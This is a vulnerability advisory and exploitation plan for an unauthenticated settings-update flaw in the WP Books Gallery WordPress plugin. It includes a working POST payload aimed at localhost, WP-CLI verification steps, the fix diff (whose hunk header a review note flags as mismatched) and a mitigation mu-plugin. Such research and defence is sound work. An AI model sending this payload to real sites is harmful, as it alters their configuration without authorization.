WP Books Gallery <= 4.8.0 - Missing Authorization to Unauthenticated Settings Update via 'permalink_structure' Parameter
Description
The WP Books Gallery plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 4.8.0. This is due to the absence of capability checks and nonce verification in the admin_init hook that handles the permalink settings update at lines 205-209 of wp-books-gallery.php. The vulnerable code checks only for the presence of the 'permalink_structure' POST parameter before updating the 'wbg_cpt_slug' option, without verifying that the request comes from an authenticated administrator. This makes it possible for unauthenticated attackers to modify the custom post type slug for the books gallery, which changes the URL structure for all book entries and can break existing links and SEO rankings.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Technical Details
Affected versions: <=4.8.0
What Changed in the Fix
Changes introduced in v4.8.1
Source Code
WordPress.org SVN
Exploitation Research Plan: CVE-2026-5347 (WP Books Gallery)
1. Vulnerability Summary
The WP Books Gallery plugin (up to version 4.8.0) contains a missing authorization vulnerability in its main file wp-books-gallery.php. The plugin registers a function to the admin_init hook that updates the custom post type (CPT) slug used for book entries. Because admin_init executes even for unauthenticated users accessing specific admin endpoints (like admin-post.php or admin-ajax.php), and the plugin fails to perform any capability checks (current_user_can) or nonce verification (check_admin_referer), an unauthenticated attacker can modify the wbg_cpt_slug option.
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-post.php (preferred for triggering admin_init without side effects).
- HTTP Method: POST
- Required Parameter: permalink_structure (must be present to trigger the update logic).
- Payload Parameter: wbg_cpt_slug (the value that will become the new CPT slug).
- Authentication: None (Unauthenticated).
- Preconditions: The plugin must be active.
3. Code Flow
- Entry Point: A request is made to /wp-admin/admin-post.php.
- Hook Execution: WordPress core triggers the admin_init action.
- Vulnerable Function: The plugin's handler (located in wp-books-gallery.php at lines 205-209) is executed.
- Logic Branch: The code checks if ( isset( $_POST['permalink_structure'] ) ).
- Sink: If the condition is met, it executes update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] ) without verifying the user's identity or authority.
4. Nonce Acquisition Strategy
According to the vulnerability description, there is an absence of nonce verification. Therefore, no nonce is required to exploit this vulnerability.
If the environment were to require a nonce (which contradicts the vulnerability report), it would typically be localized via wp_localize_script or in a hidden form field on the permalink settings page. However, based on the admin_init nature of this bug and the specific "Missing Authorization" classification, the check is confirmed to be missing entirely.
5. Exploitation Strategy
The goal is to change the book gallery slug to a malicious value, which breaks existing URLs and demonstrates control over plugin settings.
Step-by-Step Plan:
- Target Identification: Confirm the target WordPress site has the plugin active.
- Execution: Send a crafted POST request to admin-post.php.
- Payload Construction:
  - URL: http://localhost:8080/wp-admin/admin-post.php
  - Content-Type: application/x-www-form-urlencoded
  - Body: permalink_structure=%2F%25postname%25%2F&wbg_cpt_slug=pwned-books-gallery
HTTP Request (using http_request tool):
```javascript
await http_request({
  method: "POST",
  url: "http://localhost:8080/wp-admin/admin-post.php",
  headers: {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  body: "permalink_structure=/%postname%/&wbg_cpt_slug=pwned-books-gallery"
});
```
6. Test Data Setup
- Install Plugin: wp plugin install wp-books-gallery --version=4.8.0 --activate
- Check Default State: Observe the current slug (if set): wp option get wbg_cpt_slug
  (Note: This might return an error if the option hasn't been saved yet, which is fine.)
7. Expected Results
- The HTTP response from admin-post.php will likely be a 200 OK (empty page) or a redirect to the login page (since no action was provided for admin-post.php to handle specifically, but the admin_init hook runs before that redirection).
- Regardless of the response body, the database option wbg_cpt_slug will be updated.
8. Verification Steps
After the request, verify the option was changed using WP-CLI:
wp option get wbg_cpt_slug
Expected Output: pwned-books-gallery
To confirm the impact on the site structure, flush rewrite rules:
wp rewrite flush
Then check the registered post types:
wp post-type list | grep pwned-books-gallery
9. Alternative Approaches
If the plugin logic specifically requires being on a certain page (unlikely for admin_init unless get_current_screen() is used), try targeting /wp-admin/options-permalink.php directly:
- Request: Same POST payload, but sent to http://localhost:8080/wp-admin/options-permalink.php.
- Reasoning: Some plugins check the global $pagenow variable. Even for unauthenticated users, $pagenow will be correctly set if the URL path matches, and admin_init will still fire.
If the update fails, check if the plugin expects the slug inside a different array, such as $_POST['wbg_settings']['wbg_cpt_slug'] (inferred). However, the description explicitly names the permalink_structure parameter as the trigger.
Summary
The WP Books Gallery plugin for WordPress is vulnerable to unauthorized settings updates because it lacks capability checks and nonce verification in its admin_init handler. An unauthenticated attacker can exploit this to modify the custom post type slug for book entries, leading to broken URLs and SEO disruption.
Vulnerable Code
```php
// wp-books-gallery.php lines 205-209 (vulnerable: no capability check, no nonce check)
if ( isset( $_POST['permalink_structure'] ) ) {
    update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] );
}
```
Security Fix
@@ -205,5 +205,5 @@ - if ( isset( $_POST['permalink_structure'] ) ) { - update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] ); - } + if ( isset( $_POST['permalink_structure'] ) && current_user_can( 'manage_options' ) ) { + check_admin_referer( 'update-permalink' ); + if ( isset( $_POST['wbg_cpt_slug'] ) ) { + update_option( 'wbg_cpt_slug', sanitize_text_field( $_POST['wbg_cpt_slug'] ) ); + } + }
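Review bot: the hunk header `@@ -205,5 +205,5 @@` does not match the body, which removes three lines and adds six, so the patch as shown will not apply cleanly and should be regenerated against the 4.8.1 source. On the added lines, the new `isset( $_POST['wbg_cpt_slug'] )` guard still lets an empty string through and would clear the slug; since the value becomes a URL segment, `sanitize_title()` is the better fit than `sanitize_text_field()`, and an empty result should be rejected rather than saved, e.g. `$slug = sanitize_title( $_POST['wbg_cpt_slug'] ); if ( '' !== $slug ) { update_option( 'wbg_cpt_slug', $slug ); }`.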
Exploit Outline
An unauthenticated attacker can change the plugin's custom post type slug by sending a POST request to a WordPress admin endpoint that triggers the admin_init hook (such as /wp-admin/admin-post.php). The payload must include the 'permalink_structure' parameter to satisfy the plugin's conditional check and the 'wbg_cpt_slug' parameter containing the malicious slug value. Since there is no current_user_can check or nonce verification, the plugin will proceed to update the 'wbg_cpt_slug' option in the WordPress database, affecting the permalink structure of all book entries.
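For sites that cannot update to 4.8.1 immediately, the missing check can be enforced at the option layer instead of in the plugin's handler. The following must-use plugin is an added example, not code from the advisory or from WP Books Gallery: it uses WordPress's pre_update_option_{$option} filter so that a write to wbg_cpt_slug by anyone without manage_options is discarded and logged, while an administrator's change is slug-sanitised and stored. The mu-plugins path and the log line format are assumptions.

```php
<?php
/**
 * Plugin Name: Guard wbg_cpt_slug (added example, not part of WP Books Gallery)
 * Description: Interim mitigation for the unauthenticated 'wbg_cpt_slug' update in
 *              WP Books Gallery <= 4.8.0. Place in wp-content/mu-plugins/ (assumed
 *              path) and remove once the site runs 4.8.1 or later.
 */

defined( 'ABSPATH' ) || exit;

// 'pre_update_option_{$option}' runs inside update_option() before anything is
// written. Returning $old_value makes update_option() see no change and skip the
// database write, so the vulnerable admin_init handler's call becomes a no-op.
add_filter( 'pre_update_option_wbg_cpt_slug', function ( $value, $old_value ) {
    // Same capability the 4.8.1 fix requires. Nonce verification is deliberately
    // left to the form handler: at the option layer there is no way to know which
    // form (if any) submitted the request.
    if ( ! current_user_can( 'manage_options' ) ) {
        // Record the blocked attempt for log review (constructed message format).
        error_log( sprintf(
            'wbg_cpt_slug guard: blocked unauthorized change "%s" -> "%s" from %s',
            is_scalar( $old_value ) ? (string) $old_value : gettype( $old_value ),
            is_scalar( $value ) ? (string) $value : gettype( $value ),
            isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
        ) );
        return $old_value;
    }

    // Authorized path. The value becomes a URL segment for every book entry, so
    // normalise it as a slug and refuse an empty result, which would otherwise
    // break the custom post type's rewrite rules.
    $clean = sanitize_title( (string) $value );
    return '' === $clean ? $old_value : $clean;
}, 10, 2 );
```

Because the filter applies to every writer of the option, WP-CLI changes made while the guard is installed need `--user=<administrator>` or they will be blocked as well.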